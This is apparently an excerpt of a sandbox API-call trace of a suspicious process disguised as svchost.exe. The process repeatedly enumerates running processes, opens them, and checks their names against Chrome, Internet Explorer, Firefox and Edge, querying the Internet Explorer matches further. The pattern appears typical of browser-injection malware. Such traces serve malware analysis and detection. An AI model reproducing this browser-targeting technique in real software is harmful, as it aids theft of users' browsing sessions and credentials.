	[0215.896] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0215.897] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x4688
	[0215.897] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.897] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0215.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.898] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.898] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0215.899] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.899] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.899] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0215.900] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x468c
	[0215.900] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.900] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0215.900] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.900] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.901] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0215.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.901] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.901] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0215.902] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x4690
	[0215.902] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.902] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0215.902] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.902] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.902] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.903] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0215.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.903] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.903] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0215.904] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x4694
	[0215.904] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.904] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0215.904] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.904] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.905] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0215.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.905] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.905] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0215.906] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x4698
	[0215.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.906] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0215.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.907] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.907] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0215.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.908] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.908] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0215.909] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x469c
	[0215.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.909] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0215.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.909] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.910] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0215.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.910] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.910] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0215.911] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x46a0
	[0215.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.911] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0215.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.911] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.912] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0215.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.912] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.912] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0215.913] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x46a4
	[0215.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.913] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0215.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.914] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.914] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0215.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.915] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.915] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0215.916] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x46a8
	[0215.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.916] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0215.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.916] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.916] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0215.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.917] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.917] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0215.917] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x46ac
	[0215.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.918] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0215.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.918] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.918] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0215.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.918] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.919] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0215.919] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x46b0
	[0215.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.919] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0215.920] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.920] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.920] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.920] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0215.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.921] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.921] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0215.922] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x46b4
	[0215.922] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.922] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0215.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.923] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.923] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0215.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.924] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.924] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0215.925] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x46b8
	[0215.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.925] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0215.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.925] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.926] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0215.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.926] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.927] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0215.927] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x46bc
	[0215.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.928] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0215.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.928] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.929] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0215.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.929] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.930] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0215.931] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x46c0
	[0215.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.931] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0215.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.931] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.932] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0215.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.932] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.933] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0215.933] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x46c4
	[0215.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.933] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0215.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.934] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0215.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.934] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0215.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.934] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.934] NtQueryInformationProcess (in: ProcessHandle=0x46c4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0215.935] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0215.935] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0215.936] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x46c8
	[0215.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.936] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0215.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.936] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0215.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.936] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0215.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.937] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.937] NtQueryInformationProcess (in: ProcessHandle=0x46c8, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0215.937] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0215.937] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0215.938] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x46cc
	[0215.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.938] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0215.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.938] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.939] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0215.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.939] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.939] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0215.940] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x46d0
	[0215.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.940] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0215.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.940] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.941] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0215.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.941] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.941] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.942] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x46d4
	[0215.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.942] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.942] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.943] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.943] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.943] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.944] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.945] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x46d8
	[0215.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.945] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.945] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.945] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.946] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.946] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0215.947] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x468) returned 0x46dc
	[0215.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.947] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.947] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.947] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.948] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.948] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.948] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x46e0
	[0215.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.949] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.949] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.949] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.950] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.950] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0215.950] CloseHandle (hObject=0x188) returned 1
	[0215.950] Sleep (dwMilliseconds=0x64) 
	[0216.045] GetCurrentProcessId () returned 0x110
	[0216.045] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0216.051] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
